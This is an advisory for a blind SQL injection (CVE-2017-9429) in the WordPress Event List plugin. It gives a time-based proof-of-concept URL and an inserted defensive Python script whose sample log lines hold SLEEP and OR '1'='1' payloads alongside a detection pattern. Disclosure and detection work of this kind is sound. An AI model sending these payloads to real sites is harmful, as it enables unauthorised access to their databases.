WordPress Event List Plugin <= 0.7.8 - SQL Injection Vulnerability
1. Description:

SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
allows an authenticated user to execute arbitrary SQL commands via the id
parameter to wp-admin/admin.php.
  
2. Proof of Concept:

http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&action=edit&id=1 AND SLEEP(10)
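As an added defensive illustration (not part of the original advisory and not the plugin's own code), the following Python script shows the two checks an operator cares about for this class of bug: strict validation of the id parameter as an integer, which is the shape of the fix for an injectable numeric parameter, and detection of the time-based payload from the PoC in web-server access-log lines. The log lines and IP addresses are constructed; the page and action names used for matching are taken from the PoC URL above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Common Log Format lines (not captured from any real site).
# Line 2 carries the advisory's time-based payload, line 3 a classic
# quote-based payload, lines 1 and 4 are benign.
SAMPLE_LOG = """\
203.0.113.5 - admin [12/Jun/2017:10:01:02 +0000] "GET /wp-admin/admin.php?page=el_admin_main&action=edit&id=7 HTTP/1.1" 200 5120
203.0.113.5 - admin [12/Jun/2017:10:01:09 +0000] "GET /wp-admin/admin.php?page=el_admin_main&action=edit&id=1%20AND%20SLEEP(10) HTTP/1.1" 200 5120
203.0.113.5 - admin [12/Jun/2017:10:01:30 +0000] "GET /wp-admin/admin.php?page=el_admin_main&action=edit&id=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 5120
198.51.100.9 - - [12/Jun/2017:10:02:00 +0000] "GET /index.php?p=3 HTTP/1.1" 200 2048
"""

# Minimal Common Log Format parser: client IP, auth user, timestamp,
# method, request target and status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Functions that flag a payload as a time-based (blind) probe.
TIME_BASED_RE = re.compile(r'\b(sleep|benchmark)\s*\(', re.IGNORECASE)


def is_valid_event_id(value: str) -> bool:
    """Accept only an unsigned decimal integer, the same contract a
    hardened handler would enforce (cast to int, reject everything else)
    before the value reaches a query."""
    return re.fullmatch(r'[0-9]+', value) is not None


def find_suspicious_requests(log_text: str) -> list:
    """Return every request to the plugin's edit page whose id parameter
    would fail integer validation, with a flag for time-based payloads."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if parts.path != "/wp-admin/admin.php":
            continue
        query = parse_qs(parts.query)  # percent-decodes the values
        if query.get("page") != ["el_admin_main"]:
            continue
        for raw_id in query.get("id", []):
            if is_valid_event_id(raw_id):
                continue
            hits.append({
                "ip": m.group("ip"),
                "user": m.group("user"),
                "ts": m.group("ts"),
                "id": raw_id,
                "time_based": TIME_BASED_RE.search(raw_id) is not None,
            })
    return hits


if __name__ == "__main__":
    for hit in find_suspicious_requests(SAMPLE_LOG):
        kind = "time-based probe" if hit["time_based"] else "non-numeric id"
        print(f'{hit["ts"]} {hit["ip"]} user={hit["user"]} {kind}: id={hit["id"]!r}')
```

Because the vulnerable request requires an authenticated user, the auth-user field is kept in each hit; a time-based probe against this endpoint from a logged-in account is the signal worth alerting on, and the same integer check is what an operator should expect to see applied to the parameter in any fixed release.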
3. Solution:

The plugin has been removed from WordPress. Deactivate the plug-in and wait
for a hotfix.
4. Reference:

http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-injection-sqli/
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429